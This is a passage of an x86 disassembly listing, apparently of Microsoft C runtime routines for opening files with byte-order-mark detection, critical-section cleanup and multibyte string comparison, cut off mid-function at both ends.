mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_40DF44
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_40DFCC: ; CODE XREF: sub_40DF44+41�j
; sub_40DF44+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFD3 proc near ; CODE XREF: sub_40813B+E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421840
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40DFF2: ; CODE XREF: sub_40DFD3+7F�j
mov [ebp+var_20], edi
cmp edi, dword_434DC0
jge short loc_40E054
mov esi, edi
shl esi, 2
mov eax, dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_40E051
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40E024
push eax
call sub_4034C4
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40E024
inc [ebp+var_1C]
loc_40E024: ; CODE XREF: sub_40DFD3+40�j
; sub_40DFD3+4C�j
cmp edi, 14h
jl short loc_40E051
mov eax, dword_433DA0
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D170 ; RtlDeleteCriticalSection
mov eax, dword_433DA0
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, dword_433DA0
mov [esi+eax], ebx
loc_40E051: ; CODE XREF: sub_40DFD3+38�j
; sub_40DFD3+54�j
inc edi
jmp short loc_40DFF2
; ---------------------------------------------------------------------------
loc_40E054: ; CODE XREF: sub_40DFD3+28�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E069
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40DFD3 endp
; =============== S U B R O U T I N E =======================================
sub_40E069 proc near ; CODE XREF: sub_40DFD3+88�p
; DATA XREF: .rdata:00421858�o
push 1
call sub_40591F
pop ecx
retn
sub_40E069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E072 proc near ; CODE XREF: sub_40E6B0+72�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor ebx, ebx
test byte ptr [ebp+arg_8], 80h
push edi
push 10h
mov esi, eax
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_2], bl
mov [ebp+var_28], 0Ch
mov [ebp+var_24], ebx
pop edi
jz short loc_40E0A4
mov [ebp+var_20], ebx
mov [ebp+var_1], 10h
jmp short loc_40E0AE
; ---------------------------------------------------------------------------
loc_40E0A4: ; CODE XREF: sub_40E072+27�j
mov [ebp+var_20], 1
mov [ebp+var_1], bl
loc_40E0AE: ; CODE XREF: sub_40E072+30�j
lea eax, [ebp+var_14]
push eax
call sub_410889
test eax, eax
pop ecx
jz short loc_40E0C9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0C9: ; CODE XREF: sub_40E072+48�j
lea eax, [ebp+var_18]
push eax
call sub_407906
test eax, eax
pop ecx
jz short loc_40E0E4
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0E4: ; CODE XREF: sub_40E072+63�j
mov eax, 8000h
test [ebp+arg_8], eax
jnz short loc_40E100
test [ebp+arg_8], 74000h
jnz short loc_40E0FC
cmp [ebp+var_14], eax
jz short loc_40E100
loc_40E0FC: ; CODE XREF: sub_40E072+83�j
or [ebp+var_1], 80h
loc_40E100: ; CODE XREF: sub_40E072+7A�j
; sub_40E072+88�j
mov eax, [ebp+arg_8]
push 3
pop edx
and eax, edx
sub eax, ebx
mov ecx, 80000000h
jz short loc_40E14F
dec eax
jz short loc_40E146
dec eax
jz short loc_40E13D
loc_40E117: ; CODE XREF: sub_40E072+F6�j
; sub_40E072+14F�j ...
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
jmp loc_40E5CC
; ---------------------------------------------------------------------------
loc_40E13D: ; CODE XREF: sub_40E072+A3�j
mov [ebp+var_C], 0C0000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E146: ; CODE XREF: sub_40E072+A0�j
mov [ebp+var_C], 40000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E14F: ; CODE XREF: sub_40E072+9D�j
mov [ebp+var_C], ecx
loc_40E152: ; CODE XREF: sub_40E072+D2�j
; sub_40E072+DB�j
mov eax, [ebp+arg_C]
sub eax, edi
jz short loc_40E18E
sub eax, edi
jz short loc_40E185
sub eax, edi
jz short loc_40E17C
sub eax, edi
jz short loc_40E177
sub eax, 40h
jnz short loc_40E117
xor eax, eax
cmp [ebp+var_C], ecx
setz al
mov [ebp+var_8], eax
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E177: ; CODE XREF: sub_40E072+F1�j
mov [ebp+var_8], edx
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E17C: ; CODE XREF: sub_40E072+ED�j
mov [ebp+var_8], 2
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E185: ; CODE XREF: sub_40E072+E9�j
mov [ebp+var_8], 1
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E18E: ; CODE XREF: sub_40E072+E5�j
mov [ebp+var_8], ebx
loc_40E191: ; CODE XREF: sub_40E072+103�j
; sub_40E072+108�j ...
mov eax, [ebp+arg_8]
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
jg short loc_40E1E2
jz short loc_40E1D9
cmp eax, ebx
jz short loc_40E1D9
cmp eax, 100h
jz short loc_40E1D0
cmp eax, 200h
jz loc_40E254
cmp eax, 300h
jnz loc_40E117
mov [ebp+var_10], 2
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D0: ; CODE XREF: sub_40E072+13D�j
mov [ebp+var_10], 4
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D9: ; CODE XREF: sub_40E072+132�j
; sub_40E072+136�j
mov [ebp+var_10], 3
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1E2: ; CODE XREF: sub_40E072+130�j
cmp eax, 500h
jz short loc_40E1F8
cmp eax, 600h
jz short loc_40E254
cmp eax, edx
jnz loc_40E117
loc_40E1F8: ; CODE XREF: sub_40E072+175�j
mov [ebp+var_10], 1
loc_40E1FF: ; CODE XREF: sub_40E072+15C�j
; sub_40E072+165�j ...
mov ecx, [ebp+arg_8]
mov eax, 100h
test ecx, eax
mov edi, 80h
jz short loc_40E222
mov edx, dword_425F74
not edx
and edx, [ebp+arg_10]
test dl, dl
js short loc_40E222
xor edi, edi
inc edi
loc_40E222: ; CODE XREF: sub_40E072+19C�j
; sub_40E072+1AB�j
test cl, 40h
jz short loc_40E23E
or [ebp+var_C], 10000h
or edi, 4000000h
cmp [ebp+var_18], 2
jnz short loc_40E23E
or [ebp+var_8], 4
loc_40E23E: ; CODE XREF: sub_40E072+1B3�j
; sub_40E072+1C6�j
test cx, 1000h
jz short loc_40E247
or edi, eax
loc_40E247: ; CODE XREF: sub_40E072+1D1�j
test cl, 20h
jz short loc_40E25D
or edi, 8000000h
jmp short loc_40E268
; ---------------------------------------------------------------------------
loc_40E254: ; CODE XREF: sub_40E072+144�j
; sub_40E072+17C�j
mov [ebp+var_10], 5
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E25D: ; CODE XREF: sub_40E072+1D8�j
test cl, 10h
jz short loc_40E268
or edi, 10000000h
loc_40E268: ; CODE XREF: sub_40E072+1E0�j
; sub_40E072+1EE�j
call sub_40EEB0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40E28B
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_40E2DB
; ---------------------------------------------------------------------------
loc_40E28B: ; CODE XREF: sub_40E072+200�j
mov eax, [ebp+arg_0]
push ebx
push edi
push [ebp+var_10]
mov dword ptr [eax], 1
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
push [ebp+var_C]
push [ebp+arg_4]
call ds:dword_41D06C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40E2E7
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
loc_40E2CE: ; CODE XREF: sub_40E072+2A2�j
call ds:dword_41D0F0 ; RtlGetLastWin32Error
push eax
call sub_4057F9
loc_40E2DA: ; CODE XREF: sub_40E072+345�j
pop ecx
loc_40E2DB: ; CODE XREF: sub_40E072+217�j
call sub_4057D3
mov eax, [eax]
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E2E7: ; CODE XREF: sub_40E072+23F�j
push edi
call ds:dword_41D148 ; GetFileType
cmp eax, ebx
jnz short loc_40E316
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FEh
push edi
call ds:dword_41D0DC ; CloseHandle
jmp short loc_40E2CE
; ---------------------------------------------------------------------------
loc_40E316: ; CODE XREF: sub_40E072+27E�j
cmp eax, 2
jnz short loc_40E321
or [ebp+var_1], 40h
jmp short loc_40E32A
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40E072+2A7�j
cmp eax, 3
jnz short loc_40E32A
or [ebp+var_1], 8
loc_40E32A: ; CODE XREF: sub_40E072+2AD�j
; sub_40E072+2B2�j
push edi
push dword ptr [esi]
call sub_40EC7F
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, dword_433CA0[edx*4]
pop ecx
pop ecx
mov cl, [ebp+var_1]
or cl, 1
mov [edx+eax+4], cl
mov eax, [esi]
mov edx, eax
and eax, 1Fh
imul eax, 28h
sar edx, 5
mov edx, dword_433CA0[edx*4]
lea eax, [edx+eax+24h]
and byte ptr [eax], 80h
mov [ebp+var_3], cl
and [ebp+var_3], 48h
mov [ebp+var_1], cl
jnz loc_40E3FD
test cl, 80h
jz loc_40E637
test byte ptr [ebp+arg_8], 2
jz short loc_40E3FD
push 2
or edi, 0FFFFFFFFh
push edi
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40E3BC
call sub_4057E6
cmp dword ptr [eax], 83h
jz short loc_40E3FD
loc_40E3B0: ; CODE XREF: sub_40E072+379�j
; sub_40E072+389�j ...
push dword ptr [esi]
call sub_408A4D
jmp loc_40E2DA
; ---------------------------------------------------------------------------
loc_40E3BC: ; CODE XREF: sub_40E072+32F�j
push 1
lea eax, [ebp+var_4]
push eax
push dword ptr [esi]
mov [ebp+var_4], bl
call sub_409DAD
add esp, 0Ch
test eax, eax
jnz short loc_40E3ED
cmp [ebp+var_4], 1Ah
jnz short loc_40E3ED
mov eax, [ebp+var_8]
cdq
push edx
push eax
push dword ptr [esi]
call sub_4105A7
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3ED: ; CODE XREF: sub_40E072+35F�j
; sub_40E072+365�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, edi
jz short loc_40E3B0
loc_40E3FD: ; CODE XREF: sub_40E072+305�j
; sub_40E072+318�j ...
test [ebp+var_1], 80h
jz loc_40E637
mov ecx, 74000h
test [ebp+arg_8], ecx
mov edi, 4000h
jnz short loc_40E425
mov eax, [ebp+var_14]
and eax, ecx
jnz short loc_40E422
or [ebp+arg_8], edi
jmp short loc_40E425
; ---------------------------------------------------------------------------
loc_40E422: ; CODE XREF: sub_40E072+3A9�j
or [ebp+arg_8], eax
loc_40E425: ; CODE XREF: sub_40E072+3A2�j
; sub_40E072+3AE�j
mov eax, [ebp+arg_8]
and eax, ecx
cmp eax, edi
jz short loc_40E472
cmp eax, 10000h
jz short loc_40E45E
cmp eax, 14000h
jz short loc_40E45E
cmp eax, 20000h
jz short loc_40E46C
cmp eax, 24000h
jz short loc_40E46C
cmp eax, 40000h
jz short loc_40E458
cmp eax, 44000h
jnz short loc_40E475
loc_40E458: ; CODE XREF: sub_40E072+3DD�j
mov [ebp+var_2], 1
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E45E: ; CODE XREF: sub_40E072+3C1�j
; sub_40E072+3C8�j
mov ecx, [ebp+arg_8]
mov eax, 301h
and ecx, eax
cmp ecx, eax
jnz short loc_40E475
loc_40E46C: ; CODE XREF: sub_40E072+3CF�j
; sub_40E072+3D6�j
mov [ebp+var_2], 2
jmp short loc_40E475
; ---------------------------------------------------------------------------
loc_40E472: ; CODE XREF: sub_40E072+3BA�j
mov [ebp+var_2], bl
loc_40E475: ; CODE XREF: sub_40E072+3E4�j
; sub_40E072+3EA�j ...
test [ebp+arg_8], 70000h
jz loc_40E637
test [ebp+var_1], 40h
mov [ebp+var_8], ebx
jnz loc_40E637
mov eax, [ebp+var_C]
mov ecx, 0C0000000h
and eax, ecx
cmp eax, 40000000h
jz loc_40E55B
cmp eax, 80000000h
jz short loc_40E522
cmp eax, ecx
jnz loc_40E637
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe short loc_40E4D1
cmp eax, 4
jbe short loc_40E4F8
loc_40E4C8: ; CODE XREF: sub_40E072+500�j
cmp eax, 5
jnz loc_40E637
loc_40E4D1: ; CODE XREF: sub_40E072+44F�j
; sub_40E072+496�j ...
movsx eax, [ebp+var_2]
xor edi, edi
dec eax
jz loc_40E604
dec eax
jnz loc_40E637
mov [ebp+var_8], 0FEFFh
mov [ebp+var_10], 2
jmp loc_40E612
; ---------------------------------------------------------------------------
loc_40E4F8: ; CODE XREF: sub_40E072+454�j
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz short loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
loc_40E522: ; CODE XREF: sub_40E072+437�j
push 3
lea eax, [ebp+var_8]
push eax
push dword ptr [esi]
call sub_409DAD
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
cmp eax, 2
jz short loc_40E5AB
cmp eax, 3
jnz loc_40E5F6
cmp [ebp+var_8], 0BFBBEFh
jnz short loc_40E5AB
mov [ebp+var_2], 1
jmp loc_40E637
; ---------------------------------------------------------------------------
loc_40E55B: ; CODE XREF: sub_40E072+42C�j
mov eax, [ebp+var_10]
cmp eax, ebx
jbe loc_40E637
cmp eax, 2
jbe loc_40E4D1
cmp eax, 4
ja loc_40E4C8
push 2
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
or eax, edx
jz loc_40E4D1
push ebx
push ebx
push ebx
push dword ptr [esi]
call sub_40CCBE
add esp, 10h
and eax, edx
loc_40E59D: ; CODE XREF: sub_40E072+590�j
cmp eax, 0FFFFFFFFh
jnz loc_40E637
jmp loc_40E3B0
; ---------------------------------------------------------------------------
loc_40E5AB: ; CODE XREF: sub_40E072+4CC�j
; sub_40E072+4DE�j
mov eax, [ebp+var_8]
and eax, 0FFFFh
cmp eax, 0FFFEh
jnz short loc_40E5D3
push dword ptr [esi]
call sub_408A4D
pop ecx
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40E5CC: ; CODE XREF: sub_40E072+C6�j
mov eax, esi
jmp loc_40E6AB
; ---------------------------------------------------------------------------
loc_40E5D3: ; CODE XREF: sub_40E072+546�j
cmp eax, 0FEFFh
jnz short loc_40E5F6
push ebx
push 2
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
mov [ebp+var_2], 2
jmp short loc_40E637
; ---------------------------------------------------------------------------
loc_40E5F6: ; CODE XREF: sub_40E072+4D1�j
; sub_40E072+566�j
push ebx
push ebx
push dword ptr [esi]
call sub_41075B
add esp, 0Ch
jmp short loc_40E59D
; ---------------------------------------------------------------------------
loc_40E604: ; CODE XREF: sub_40E072+466�j
mov [ebp+var_8], 0BFBBEFh
mov [ebp+var_10], 3
loc_40E612: ; CODE XREF: sub_40E072+481�j
; sub_40E072+5C3�j
mov eax, [ebp+var_10]
sub eax, edi
push eax
lea eax, [ebp+edi+var_8]
push eax
push dword ptr [esi]
call sub_40D420
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_40E3B0
add edi, eax
cmp [ebp+var_10], edi
jg short loc_40E612
loc_40E637: ; CODE XREF: sub_40E072+30E�j
; sub_40E072+38F�j ...
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov cl, [eax]
xor cl, [ebp+var_2]
and cl, 7Fh
xor [eax], cl
mov eax, [esi]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_433CA0[ecx*4]
lea eax, [ecx+eax+24h]
mov ecx, [ebp+arg_8]
mov dl, [eax]
shr ecx, 10h
shl cl, 7
and dl, 7Fh
or cl, dl
cmp [ebp+var_3], bl
mov [eax], cl
jnz short loc_40E6A9
test byte ptr [ebp+arg_8], 8
jz short loc_40E6A9
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_433CA0[eax*4]
lea eax, [eax+esi+4]
or byte ptr [eax], 20h
loc_40E6A9: ; CODE XREF: sub_40E072+614�j
; sub_40E072+61A�j
mov eax, ebx
loc_40E6AB: ; CODE XREF: sub_40E072+270�j
; sub_40E072+55C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E072 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6B0 proc near ; CODE XREF: sub_40E77C+14�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 14h
push offset dword_421860
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
xor eax, eax
mov edi, [ebp+arg_10]
cmp edi, esi
setnz al
cmp eax, esi
jnz short loc_40E6EA
loc_40E6CF: ; CODE XREF: sub_40E6B0+47�j
; sub_40E6B0+5B�j
call sub_4057D3
push 16h
pop edi
mov [eax], edi
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
mov eax, edi
jmp short loc_40E743
; ---------------------------------------------------------------------------
loc_40E6EA: ; CODE XREF: sub_40E6B0+1D�j
or dword ptr [edi], 0FFFFFFFFh
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jz short loc_40E6CF
cmp [ebp+arg_14], esi
jz short loc_40E70D
mov eax, [ebp+arg_C]
and eax, 0FFFFFE7Fh
neg eax
sbb eax, eax
inc eax
jz short loc_40E6CF
loc_40E70D: ; CODE XREF: sub_40E6B0+4C�j
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
mov eax, edi
call sub_40E072
add esp, 14h
mov [ebp+var_20], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E74E
mov eax, [ebp+var_20]
cmp eax, esi
jz short loc_40E743
or dword ptr [edi], 0FFFFFFFFh
loc_40E743: ; CODE XREF: sub_40E6B0+38�j
; sub_40E6B0+8E�j
call __SEH_epilog4
retn
sub_40E6B0 endp
; =============== S U B R O U T I N E =======================================
sub_40E749 proc near ; DATA XREF: .rdata:00421878�o
xor esi, esi
mov edi, [ebp+18h]
sub_40E749 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E74E proc near ; CODE XREF: sub_40E6B0+84�p
cmp [ebp-1Ch], esi
jz short locret_40E77B
cmp [ebp-20h], esi
jz short loc_40E773
mov eax, [edi]
mov ecx, eax
sar ecx, 5
and eax, 1Fh
imul eax, 28h
mov ecx, dword_433CA0[ecx*4]
lea eax, [ecx+eax+4]
and byte ptr [eax], 0FEh
loc_40E773: ; CODE XREF: sub_40E74E+8�j
push dword ptr [edi]
call sub_40EE8E
pop ecx
locret_40E77B: ; CODE XREF: sub_40E74E+3�j
retn
sub_40E74E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E77C proc near ; CODE XREF: sub_4081FF+26D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40E6B0
add esp, 18h
pop ebp
retn
sub_40E77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E79A proc near ; CODE XREF: sub_40E9B4+A�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push [ebp+arg_8]
lea ecx, [ebp+var_14]
call sub_40271F
mov edx, [ebp+arg_0]
xor esi, esi
cmp edx, esi
jnz short loc_40E7E4
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E7DA
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E7DA: ; CODE XREF: sub_40E79A+37�j
mov eax, 7FFFFFFFh
jmp loc_40E9B1
; ---------------------------------------------------------------------------
loc_40E7E4: ; CODE XREF: sub_40E79A+19�j
push ebx
mov ebx, [ebp+arg_4]
cmp ebx, esi
jnz short loc_40E81B
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40E811
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E811: ; CODE XREF: sub_40E79A+6E�j
mov eax, 7FFFFFFFh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E81B: ; CODE XREF: sub_40E79A+50�j
mov eax, [ebp+var_10]
cmp [eax+8], esi
jnz short loc_40E847
lea eax, [ebp+var_14]
push eax
push ebx
push edx
call sub_4027D6
add esp, 0Ch
cmp [ebp+var_8], 0
jz loc_40E9B0
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40E9B0
; ---------------------------------------------------------------------------
loc_40E847: ; CODE XREF: sub_40E79A+87�j
push edi
mov edi, 200h
loc_40E84D: ; CODE XREF: sub_40E79A+1CD�j
movzx cx, byte ptr [edx]
movzx ecx, cx
movzx esi, cl
inc edx
test byte ptr [esi+eax+1Dh], 4
mov [ebp+arg_0], edx
jz short loc_40E8BB
cmp byte ptr [edx], 0
jnz short loc_40E86B
xor esi, esi
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E86B: ; CODE XREF: sub_40E79A+CB�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
dec edx
push edx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E896
movzx ax, [ebp+var_4]
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E896: ; CODE XREF: sub_40E79A+F3�j
cmp eax, 2
jnz loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E8B0: ; CODE XREF: sub_40E79A+FA�j
inc [ebp+arg_0]
movzx esi, ax
mov eax, [ebp+var_10]
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8BB: ; CODE XREF: sub_40E79A+C6�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E8D4
movzx cx, byte ptr [ecx+11Dh]
movzx esi, cx
jmp short loc_40E8D7
; ---------------------------------------------------------------------------
loc_40E8D4: ; CODE XREF: sub_40E79A+12B�j
movzx esi, dx
loc_40E8D7: ; CODE XREF: sub_40E79A+CF�j
; sub_40E79A+11F�j ...
movzx cx, byte ptr [ebx]
movzx ecx, cx
movzx edx, cl
inc ebx
test byte ptr [edx+eax+1Dh], 4
jz short loc_40E93E
cmp byte ptr [ebx], 0
jnz short loc_40E8F2
xor ecx, ecx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E8F2: ; CODE XREF: sub_40E79A+152�j
push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
lea ecx, [ebx-1]
push ecx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C2F9
add esp, 24h
cmp eax, 1
jnz short loc_40E91F
movzx ax, [ebp+var_4]
jmp short loc_40E935
; ---------------------------------------------------------------------------
loc_40E91F: ; CODE XREF: sub_40E79A+17C�j
cmp eax, 2
jnz short loc_40E96C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40E935: ; CODE XREF: sub_40E79A+183�j
movzx ecx, ax
mov eax, [ebp+var_10]
inc ebx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E93E: ; CODE XREF: sub_40E79A+14D�j
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40E957
movzx cx, byte ptr [ecx+11Dh]
movzx ecx, cx
jmp short loc_40E95A
; ---------------------------------------------------------------------------
loc_40E957: ; CODE XREF: sub_40E79A+1AE�j
movzx ecx, dx
loc_40E95A: ; CODE XREF: sub_40E79A+156�j
; sub_40E79A+1A2�j ...
cmp cx, si
jnz short loc_40E98B
test si, si
jz short loc_40E9A0
mov edx, [ebp+arg_0]
jmp loc_40E84D
; ---------------------------------------------------------------------------
loc_40E96C: ; CODE XREF: sub_40E79A+FF�j
; sub_40E79A+188�j
call sub_4057D3
mov dword ptr [eax], 16h
cmp [ebp+var_8], 0
jz short loc_40E984
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E984: ; CODE XREF: sub_40E79A+1E1�j
mov eax, 7FFFFFFFh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E98B: ; CODE XREF: sub_40E79A+1C3�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_8], 0
jz short loc_40E9AF
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40E9AF
; ---------------------------------------------------------------------------
loc_40E9A0: ; CODE XREF: sub_40E79A+1C8�j
cmp [ebp+var_8], 0
jz short loc_40E9AD
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40E9AD: ; CODE XREF: sub_40E79A+20A�j
xor eax, eax
loc_40E9AF: ; CODE XREF: sub_40E79A+1EF�j
; sub_40E79A+1FB�j ...
pop edi
loc_40E9B0: ; CODE XREF: sub_40E79A+7C�j
; sub_40E79A+9B�j ...
pop ebx
loc_40E9B1: ; CODE XREF: sub_40E79A+45�j
pop esi
leave
retn
sub_40E79A endp
; =============== S U B R O U T I N E =======================================
sub_40E9B4 proc near ; CODE XREF: sub_4081FF+1E6�p
; sub_4081FF+203�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40E79A
add esp, 0Ch
retn
sub_40E9B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C7 proc near ; CODE XREF: sub_40EB30+E�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40E9DC
xor eax, eax
jmp loc_40EB19
; ---------------------------------------------------------------------------
loc_40E9DC: ; CODE XREF: sub_40E9C7+C�j
push edi
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
mov edi, [ebp+var_C]
cmp [edi+8], ebx
jnz short loc_40EA16
push [ebp+arg_8]
